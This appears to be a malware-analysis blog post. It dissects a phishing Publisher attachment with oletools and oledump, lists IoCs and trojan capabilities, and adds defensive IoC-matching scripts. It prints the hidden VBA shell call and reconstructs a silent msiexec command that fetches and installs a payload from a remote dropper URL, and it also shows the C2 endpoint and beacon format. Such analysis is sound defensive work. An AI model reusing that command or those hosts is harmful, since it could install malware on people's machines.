As our analysis of the phishing email begins we also have its suspicious attachment, a Microsoft Publisher document (the same approach applies to .pub and .wiz files). Opened in an isolated analysis VM with macros disabled, it should not run anything and should look similar to this one:

[Figure: the suspicious document opened with macros disabled]

After looking at the macros, the code looks relatively clean, but we won't be fooled: the macro source is not the only place a payload can live. The file is an OLE compound document (OLE, Object Linking and Embedding, is the container format behind legacy Office files), and its streams, including those of embedded VBA UserForms, are another place where attackers hide strings and commands despite the format's legitimate purpose. A macro can read those values back at run time, so the VBA text alone can look harmless.

So how do we scan for OLE objects?

Introducing oletools

Using the open-source oletools package we can quickly scan the document (or .pub) for suspicious or malicious calls; olevba extracts the VBA source and flags known-bad keywords, and --decode additionally decodes the hex and Base64 strings it finds:

$ olevba --decode ~/invoice.pub 
...abbrev...
-------------------------------------------------------------------------------
VBA FORM Variable "TextBox1" IN 'invoice.pub' - OLE stream: u'VBA/ZclBlack'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Set arabsky = CreateObject("WScript.Shell")
arabsky.Exec("AAA")
+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| AutoExec   | Document_Open        | Runs when the Word or Publisher         |
|            |                      | document is opened                      |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | WScript.Shell        | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | run                  | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | sample               | May detect Anubis Sandbox               |
| Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
|            |                      | be used to obfuscate strings (option    |
|            |                      | --decode to see all)                    |
| Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
|            |                      | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | notepad.exe          | Executable file name                    |
| Hex String | '\t\xfd.\xff'        | 09FD2EFF                                |
| Hex String | '\x00\xc0O\x8e\xf3-' | 00C04F8EF32D                            |
| Hex String | '\xba\xda\xe2\x11'   | badae211                                |
| Hex String | '\xba\xda\xe2\x12'   | badae212                                |
| Hex String | '\xba\xda\xe24'      | badae234                                |
| Hex String | '\xd9!\xcb\x9a'      | D921CB9A                                |
| Hex String | '\xf1U\xc6\xae\xa09' | F155C6AEA039                            |
| Hex String | '<%\xe1@'            | 3C25E140                                |
| Hex String | '\xe6A\xbc\x90\xa2{' | E641BC90A27B                            |
| Base64     | =>L                  | PT5M                                    |
| String     |                      |                                         |
| Base64     | 'e\xc9A\x95\xa7$'    | ZclBlack                                |
| String     |                      |                                         |
+------------+----------------------+-----------------------------------------+

Here we can see a few interesting calls that indeed alert us to this document being suspicious, if not outright malicious:

  • Document_Open
  • WScript.Shell
  • Numerous hex strings

Note: the attacker has even tried to mislead analysts with a decoy: the macro contains the string notepad.exe (reported above as an IOC), suggesting that all it does is open Notepad. Note also that the only shell call in the VBA text, arabsky.Exec("AAA"), has a placeholder argument; the real command is not in the macro source.

Back to extracting OLE Streams

Didier Stevens' open-source oledump.py is a good tool for this job. By default it lists and indexes every stream in the compound file; an M in the second column marks a VBA module stream containing macro code, a lower-case m one that carries attributes only:

$ ./oledump.py  ~/invoice.pub 
  1:        94 '\x01CompObj'
  2:        12 '\x03Internal'
  3:       152 '\x05DocumentSummaryInformation'
  4:     16384 '\x05SummaryInformation'
  5:     10404 'Contents'
  6:         0 'Envelope'
  7:     25748 'Escher/EscherDelayStm'
  8:      1868 'Escher/EscherStm'
  9:        86 'Quill/QuillSub/\x01CompObj'
 10:      3584 'Quill/QuillSub/CONTENTS'
 11:       485 'VBA/PROJECT'
 12:        68 'VBA/PROJECTwm'
 13: M    9253 'VBA/VBA/ThisDocument'
 14: m    1159 'VBA/VBA/ZclBlack'
 15:      3940 'VBA/VBA/_VBA_PROJECT'
 16:       789 'VBA/VBA/dir'
 17:        97 'VBA/ZclBlack/\x01CompObj'
 18:       376 'VBA/ZclBlack/\x03VBFrame'
 19:       407 'VBA/ZclBlack/f'
 20:       348 'VBA/ZclBlack/o'

Several of these streams belong to the ZclBlack UserForm (VBA/ZclBlack/...: \x03VBFrame holds the form's properties as text, f the control definitions and o the controls' contents), so we take a closer look at those with -s <index>:

 $ ./oledump.py  -s 19 ~/invoice.pub 
...
00000070: 00 00 00 00 00 15 00 4C  61 62 65 6C 31 00 00 43  .......Label1..C
00000080: 3A 5C 57 69 6E 64 6F 77  73 5C 53 79 73 74 65 6D  :\Windows\System
00000090: 33 32 5C 6D 73 69 65 78  65 63 2E 65 78 65 00 D9  32\msiexec.exe..
000000A0: 13 00 00 AB 14 00 00 00  00 3C 00 F7 01 00 00 06  .........<......
000000B0: 00 00 80 0D 00 00 80 0A  00 00 00 32 00 00 00 38  ...........2...8
000000C0: 00 00 00 01 00 15 00 4C  61 62 65 6C 32 00 00 57  .......Label2..W
000000D0: 73 63 72 69 70 74 2E 53  68 65 6C 6C 00 00 00 D9  script.Shell....
000000E0: 13 00 00 0E 0E 00 00 00  00 38 00 F7 01 00 00 06  .........8......
...
$ ./oledump.py  -s 20 ~/invoice.pub 
...
000000F0: 40 00 00 80 CE 18 00 00  8B 07 00 00 53 65 74 20  @...........Set 
00000100: 61 72 61 62 73 6B 79 20  3D 20 43 72 65 61 74 65  arabsky = Create
00000110: 4F 62 6A 65 63 74 28 22  57 53 63 72 69 70 74 2E  Object("WScript.
00000120: 53 68 65 6C 6C 22 29 0D  0A 61 72 61 62 73 6B 79  Shell")..arabsky
00000130: 2E 45 78 65 63 28 22 41  41 41 22 29 00 02 1C 00  .Exec("AAA")....
00000140: 37 00 00 00 06 00 00 80  00 20 00 40 A5 00 00 00  7........ .@....
00000150: CC 02 00 00 54 61 68 6F  6D 61 00 00              ....Tahoma..
$ ./oledump.py  -s 18 ~/invoice.pub 
00000000: 56 45 52 53 49 4F 4E 20  35 2E 30 30 0D 0A 42 65  VERSION 5.00..Be
00000010: 67 69 6E 20 7B 43 36 32  41 36 39 46 30 2D 31 36  gin {C62A69F0-16
00000020: 44 43 2D 31 31 43 45 2D  39 45 39 38 2D 30 30 41  DC-11CE-9E98-00A
00000030: 41 30 30 35 37 34 41 34  46 7D 20 5A 63 6C 42 6C  A00574A4F} ZclBl
00000040: 61 63 6B 20 0D 0A 20 20  20 43 61 70 74 69 6F 6E  ack ..   Caption
00000050: 20 20 20 20 20 20 20 20  20 3D 20 20 20 22 55 73           =   "Us
00000060: 65 72 46 6F 72 6D 31 22  0D 0A 20 20 20 43 6C 69  erForm1"..   Cli
00000070: 65 6E 74 48 65 69 67 68  74 20 20 20 20 3D 20 20  entHeight    =  
00000080: 20 33 31 38 30 0D 0A 20  20 20 43 6C 69 65 6E 74   3180..   Client
00000090: 4C 65 66 74 20 20 20 20  20 20 3D 20 20 20 34 35  Left      =   45
000000A0: 0D 0A 20 20 20 43 6C 69  65 6E 74 54 6F 70 20 20  ..   ClientTop  
000000B0: 20 20 20 20 20 3D 20 20  20 33 37 35 0D 0A 20 20       =   375..  
000000C0: 20 43 6C 69 65 6E 74 57  69 64 74 68 20 20 20 20   ClientWidth    
000000D0: 20 3D 20 20 20 34 37 31  30 0D 0A 20 20 20 53 74   =   4710..   St
000000E0: 61 72 74 55 70 50 6F 73  69 74 69 6F 6E 20 3D 20  artUpPosition = 
000000F0: 20 20 31 20 20 27 43 65  6E 74 65 72 4F 77 6E 65    1  'CenterOwne
00000100: 72 0D 0A 20 20 20 54 61  67 20 20 20 20 20 20 20  r..   Tag       
00000110: 20 20 20 20 20 20 3D 20  20 20 22 6B 3D 34 20 64        =   "k=4 d
00000120: 3D 34 20 7A 3D 31 31 31  20 2F 71 20 2F 6E 6F 72  =4 z=111 /q /nor
00000130: 65 73 74 61 72 74 20 2F  69 20 68 74 74 70 3A 2F  estart /i http:/
00000140: 2F 6F 66 66 69 63 65 68  6F 6D 65 6D 73 2E 63 6F  /officehomems.co
00000150: 6D 2F 6C 73 6D 22 0D 0A  20 20 20 54 79 70 65 49  m/lsm"..   TypeI
00000160: 6E 66 6F 56 65 72 20 20  20 20 20 3D 20 20 20 32  nfoVer     =   2
00000170: 30 0D 0A 45 6E 64 0D 0A                           0..End..

Simplified version, putting the pieces together (the executable from stream 19 and the arguments from the form's Tag property in stream 18):

  • msiexec k=4 d=4 z=111 /q /norestart /i http://officehomems.com/lsm

/i tells msiexec to install the package it fetches from that URL, /q suppresses all UI and /norestart prevents a reboot; the k=4 d=4 z=111 pairs are property assignments handed to the package.
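As an added example (not code from the original post), here is a small pure-Python helper that does by hand what we just did by eye: it parses the text \x03VBFrame stream into its properties, carves printable strings out of the binary f stream, picks out URLs and executable paths, and joins the executable with the Tag value into the command line. The two inputs are reconstructed from the hex dumps above (stream 18 in full, stream 19 only the fragment shown); on a real file the raw streams come from oledump.py -s <index> -d. The order in which the macro concatenates executable and arguments is an assumption: the page shows the pieces, not the VBA that joins them.

```python
import re
from typing import Dict, List, Optional

# Input 1: the complete '\x03VBFrame' stream (oledump index 18), transcribed from the
# hex dump above. It is plain text, so it is embedded here as a bytes literal.
VBFRAME_STREAM = (
    b"VERSION 5.00\r\n"
    b"Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} ZclBlack \r\n"
    b'   Caption         =   "UserForm1"\r\n'
    b"   ClientHeight    =   3180\r\n"
    b"   ClientLeft      =   45\r\n"
    b"   ClientTop       =   375\r\n"
    b"   ClientWidth     =   4710\r\n"
    b"   StartUpPosition =   1  'CenterOwner\r\n"
    b'   Tag             =   "k=4 d=4 z=111 /q /norestart /i http://officehomems.com/lsm"\r\n'
    b"   TypeInfoVer     =   20\r\n"
    b"End\r\n"
)

# Input 2: the fragment of the binary 'f' stream (index 19) that the dump shows
# (offsets 0x70-0xFF only); bytes.fromhex() ignores the spaces.
F_STREAM_FRAGMENT = bytes.fromhex(
    "00 00 00 00 00 15 00 4C 61 62 65 6C 31 00 00 43 "
    "3A 5C 57 69 6E 64 6F 77 73 5C 53 79 73 74 65 6D "
    "33 32 5C 6D 73 69 65 78 65 63 2E 65 78 65 00 D9 "
    "13 00 00 AB 14 00 00 00 00 3C 00 F7 01 00 00 06 "
    "00 00 80 0D 00 00 80 0A 00 00 00 32 00 00 00 38 "
    "00 00 00 01 00 15 00 4C 61 62 65 6C 32 00 00 57 "
    "73 63 72 69 70 74 2E 53 68 65 6C 6C 00 00 00 D9 "
    "13 00 00 0E 0E 00 00 00 00 38 00 F7 01 00 00 06"
)

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
EXE_RE = re.compile(r"(?:[A-Za-z]:\\[^\s\"'<>]*\\)?[\w.-]+\.(?:exe|msi|dll|scr|vbs|ps1)\b", re.I)


def parse_vbframe(data: bytes) -> Dict[str, str]:
    """Turn the text VBFrame stream into {property: value}.

    Lines look like '   Tag   =   "value"' or "   ClientTop   =   375  'comment";
    the Begin line carries the form's CLSID and its VBA name."""
    props: Dict[str, str] = {}
    for raw in data.decode("latin-1").splitlines():
        line = raw.strip()
        begin = re.match(r"Begin\s+\{([0-9A-Fa-f-]+)\}\s+(\S+)", line)
        if begin:
            props["_clsid"], props["_name"] = begin.group(1).upper(), begin.group(2)
            continue
        if "=" not in line:          # VERSION / End lines
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if value.startswith('"'):    # quoted string: keep everything between the quotes
            value = value[1:value.rfind('"')]
        else:                        # number/enum: drop a trailing VB comment
            value = value.split("'", 1)[0].strip()
        props[key] = value
    return props


def carve_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII of at least min_len bytes, in stream order."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_iocs(strings: List[str]) -> Dict[str, List[str]]:
    """Pick URLs and Windows executable paths out of carved strings."""
    urls, execs = set(), set()
    for s in strings:
        urls.update(URL_RE.findall(s))
        execs.update(EXE_RE.findall(s))
    return {"urls": sorted(urls), "executables": sorted(execs)}


def reconstruct_command(f_stream: bytes, vbframe_stream: bytes) -> Optional[str]:
    """Join the executable hidden in the control stream with the arguments hidden in
    the form's Tag property. That the macro concatenates them in this order is an
    assumption; the document shows the pieces, not the VBA that joins them."""
    props = parse_vbframe(vbframe_stream)
    execs = find_iocs(carve_strings(f_stream))["executables"]
    if not execs or not props.get("Tag"):
        return None
    return "%s %s" % (execs[0], props["Tag"])


if __name__ == "__main__":
    print(parse_vbframe(VBFRAME_STREAM))
    print(carve_strings(F_STREAM_FRAGMENT))
    print(reconstruct_command(F_STREAM_FRAGMENT, VBFRAME_STREAM))
```

The point of carving every form stream rather than only the VBA modules is exactly what this sample shows: the macro text contains a placeholder, and the executable, the COM object name and the full msiexec argument string all live in UserForm control properties that olevba's keyword table only hints at.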

Submitting the URL to VirusTotal gives us evidence that confirms our suspicion that this is an attack:

[VirusTotal result for the URL]

Next we perform our research against the URL and the domain name:

dig officehomems.com +short
54.38.15.250

Whois Records:

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: OFFICEHOMEMS.COM
Registry Domain ID: 2328611896_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.imena.ua
Registrar URL: http://imena.ua
Updated Date: 2018-11-29T14:48:21Z
Creation Date: 2018-11-02T05:44:13Z
Registrar Registration Expiration Date: 2019-11-02T05:44:13Z
Registrar: Internet Invest, Ltd. dba Imena.ua
Registrar IANA ID: 1112
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientHold https://icann.org/epp#clientHold
Registry Registrant ID: Not Available From Registry
Registrant Name: Whois privacy protection service
Registrant Organization: Internet Invest, Ltd. dba Imena.ua
Registrant Street: Gaidara, 50 st.   
Registrant City: Kyiv
Registrant State/Province: Kyiv
Registrant Postal Code: 01033
Registrant Country: UA
Registrant Phone: +380.442010102
Registrant Phone Ext: 
Registrant Fax: +380.442010100
Registrant Fax Ext: 
Registrant Email: hostmaster@imena.ua
Registry Admin ID: Not Available From Registry
Admin Name: Whois privacy protection service

A Tale of Two Payloads

By the time we got this far in the investigation, we noticed that the attackers had changed their sender address, subject lines and payload/attachments.

We deduce that this was a reaction to a large number of bounced emails, as anti-spam filters kicked in and blocked the first sample. Is the attacker actively monitoring their mail server, or is this purely automated?

So now we have two variants to analyse:

Again, a quick search on VirusTotal reveals these are indeed trojans: [VirusTotal results for both samples]

Variant 1

  • Dropper URL: http://officehomems.com/lsm
  • lsm.msi (Packer EnigmaProtector)
  • %TEMP%\Data1\lsm.exe (registered as a service)
  • sha256 fb3b69917db8434655298eed9ce269b6b6029c275b38fa8eda9d8a3cd415b39 (as recorded; this is 63 hex digits, so one digit is missing from the published hash and it should not be loaded into a blocklist as-is)
  • size: 305KiB
  • Timestamp 2 Nov 2018

API Functions

  • System info enumeration
  • User enumeration (local and domain)
  • Keylogger
  • Privilege escalation via token stealing and manipulation
  • Send/receive files
  • Enumerate Wi-Fi networks / steal Wi-Fi keys
  • Persistence via the registry key Microsoft\Windows\CurrentVersion\Run
  • Screen capture
  • Checks whether VirtualBox or its guest additions are installed
  • Harvests browser cookies from Chrome and Firefox (cookies.sqlite)
  • Uses the Volume Shadow Copy service (vssvc.exe) to create a shadow copy

Variant 2

  • Dropper URL: mshomebox365.com/plugin
  • storsvc.exe
  • %TEMP%\Data1\storsvc.exe (registered as a service)
  • sha256 419ffcb88cfe2441b782c7afbf0309c591fb13de59a20252519decac2c9a9d85
  • size: 308KiB
  • Timestamp 2 Nov 2018

Whois record (possibly the same actor behind the same registrar and privacy service; note the creation dates one day apart):

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: MSHOMEBOX365.COM
Registry Domain ID: 2328303647_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.imena.ua
Registrar URL: http://imena.ua
Updated Date: 2018-11-29T14:48:31Z
Creation Date: 2018-11-01T09:07:11Z
Registrar Registration Expiration Date: 2019-11-01T09:07:11Z
Registrar: Internet Invest, Ltd. dba Imena.ua
Registrar IANA ID: 1112
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientHold https://icann.org/epp#clientHold
Registry Registrant ID: Not Available From Registry
Registrant Name: Whois privacy protection service
Registrant Organization: Internet Invest, Ltd. dba Imena.ua
Registrant Street: Gaidara, 50 st.   
Registrant City: Kyiv
Registrant State/Province: Kyiv
Registrant Postal Code: 01033
Registrant Country: UA
Registrant Phone: +380.442010102
Registrant Phone Ext: 
Registrant Fax: +380.442010100
Registrant Fax Ext: 
Registrant Email: hostmaster@imena.ua
Registry Admin ID: Not Available From Registry
Admin Name: Whois privacy protection service
Admin Organization: Internet Invest, Ltd. dba Imena.ua

API Functions

API functions from the Delphi-based program:

  • from Win32_ComputerSystem
  • GenerateIdKey
  • get token information
  • get_Azure
  • get_botnetAdress
  • get_botnetServerRequestRetryDelay
  • get_command
  • get_commandsManager
  • get_Data
  • get_debug
  • get_ip
  • get_Is64BitOperatingSystem
  • get_IsCompleted
  • get_keyLoggerManager
  • get_MachineName
  • get_Now
  • get_OSVersion
  • get_Owner
  • … more…

Command and Control

Botnet URL:

  • http://89.144.25.16/backnet/

Through further analysis of the binaries and the PCAP dumps from Cuckoo, we can see that the payload dials home using HTTP POST requests. Unfortunately there is no response from the server, so we cannot take the dynamic analysis any further into the command and control side.

POST data, sent repeatedly, with no reply observed:

data={"host_key":"711a0c25f2ec62880fa8a7afe2bf90adfe28c0b23eb0a536147529ffacb66dae","name":"admin@PC"}

Conclusion

Cross-referencing with the Proofpoint article, this matches their analysis of the November 15 "Downloader" campaign.

References

IoCs

Type      Indicator                                                          Resolves to / note
url       officehomems.com, officehomems.com/lsm                             54.38.15.250
url       mshomebox365.com, mshomebox365.com/plugin                          185.17.121.194
url       89.144.25.16/backnet/                                              89.144.25.16
sha256    fb3b69917db8434655298eed9ce269b6b6029c275b38fa8eda9d8a3cd415b39   lsm.msi (63 hex digits as published; one digit is missing)
sha256    419ffcb88cfe2441b782c7afbf0309c591fb13de59a20252519decac2c9a9d85  storsvc.msi
dropper   %TEMP%\Data1\lsm.exe                                               timestamp 2 Nov 2018
dropper   %TEMP%\Data1\storsvc.exe                                           timestamp 2 Nov 2018
OLE/VBA   VBA/ZclBlack                                                       UserForm streams carrying the msiexec command
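As an added example (not from the original post), here is a detection script that turns the indicators above and the check-in seen in the Command and Control section into checks over proxy log lines: domain, IP and URL-path matches, recognition of the POST body shape from the PCAP, and a count of repeated POSTs per client and URL, which is what "sends repeatedly, no reply" looks like in traffic. The log format and the four sample lines are constructed for the example. It also validates the published hashes before they go into a blocklist: the lsm.msi hash as printed above is 63 hex digits, so the check rejects it.

```python
import json
import re
from collections import Counter
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Indicators copied from the IoC list in this write-up.
IOC_DOMAINS = {"officehomems.com", "mshomebox365.com"}
IOC_IPS = {"54.38.15.250", "185.17.121.194", "89.144.25.16"}
IOC_URLS = {"officehomems.com/lsm", "mshomebox365.com/plugin", "89.144.25.16/backnet/"}
IOC_SHA256 = {
    "lsm.msi": "fb3b69917db8434655298eed9ce269b6b6029c275b38fa8eda9d8a3cd415b39",
    "storsvc.msi": "419ffcb88cfe2441b782c7afbf0309c591fb13de59a20252519decac2c9a9d85",
}

# Constructed sample proxy log, one request per line:
#   <timestamp> <client-ip> <method> <url> <status> [post-body]
# The layout is an assumption for this example, not a real product's log format.
SAMPLE_LOG = """\
2018-11-15T09:12:01Z 10.0.0.23 GET http://officehomems.com/lsm 200
2018-11-15T09:12:09Z 10.0.0.23 POST http://89.144.25.16/backnet/ 200 data={"host_key":"711a0c25f2ec62880fa8a7afe2bf90adfe28c0b23eb0a536147529ffacb66dae","name":"admin@PC"}
2018-11-15T09:13:40Z 10.0.0.41 GET https://www.microsoft.com/ 200
2018-11-15T09:14:10Z 10.0.0.23 POST http://89.144.25.16/backnet/ 200 data={"host_key":"711a0c25f2ec62880fa8a7afe2bf90adfe28c0b23eb0a536147529ffacb66dae","name":"admin@PC"}
"""

HEX64 = re.compile(r"^[0-9a-f]{64}$", re.I)


def valid_sha256(h: str) -> bool:
    """A SHA-256 is exactly 64 hex digits; anything else must not go into a blocklist."""
    return bool(HEX64.match(h))


def is_beacon_body(body: str) -> bool:
    """Match the observed check-in shape: data={"host_key":"<64 hex>","name":"<user>@<host>"}."""
    if not body.startswith("data="):
        return False
    try:
        obj = json.loads(body[len("data="):])
    except ValueError:
        return False
    return (isinstance(obj, dict)
            and valid_sha256(str(obj.get("host_key", "")))
            and "@" in str(obj.get("name", "")))


def match_request(url: str, body: str = "") -> List[str]:
    """Return the indicator tags a single request matches (empty list when clean)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    tags: List[str] = []
    if host in IOC_DOMAINS:
        tags.append("domain:" + host)
    if host in IOC_IPS:
        tags.append("ip:" + host)
    if host + parts.path in IOC_URLS:
        tags.append("url:" + host + parts.path)
    if is_beacon_body(body):
        tags.append("c2-beacon-body")
    return tags


def scan_log(log: str) -> Tuple[List[Tuple[int, List[str]]], Dict[Tuple[str, str], int]]:
    """Scan proxy log lines. Returns the per-line hits and, per (client, url), how many
    flagged POSTs were seen: a client repeating POSTs to one C2 path is the beacon."""
    hits: List[Tuple[int, List[str]]] = []
    posts: Dict[Tuple[str, str], int] = Counter()
    for no, line in enumerate(log.splitlines(), 1):
        fields = line.split(maxsplit=5)
        if len(fields) < 5:           # malformed line: skip rather than crash the scan
            continue
        client, method, url = fields[1], fields[2], fields[3]
        body = fields[5] if len(fields) > 5 else ""
        tags = match_request(url, body)
        if tags:
            hits.append((no, tags))
            if method == "POST":
                posts[(client, url)] += 1
    return hits, posts


if __name__ == "__main__":
    for name, digest in IOC_SHA256.items():
        print(name, "ok" if valid_sha256(digest) else "REJECTED (not 64 hex digits)")
    line_hits, beacons = scan_log(SAMPLE_LOG)
    for no, tags in line_hits:
        print("line", no, tags)
    print("repeated POSTs:", dict(beacons))
```

Matching on host plus path rather than on the full string keeps the URL indicators useful when the scheme or a query string changes; the body check is deliberately structural (a 64-hex host_key and a user@host name) rather than tied to the one host_key value captured here, since that value is derived per victim.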
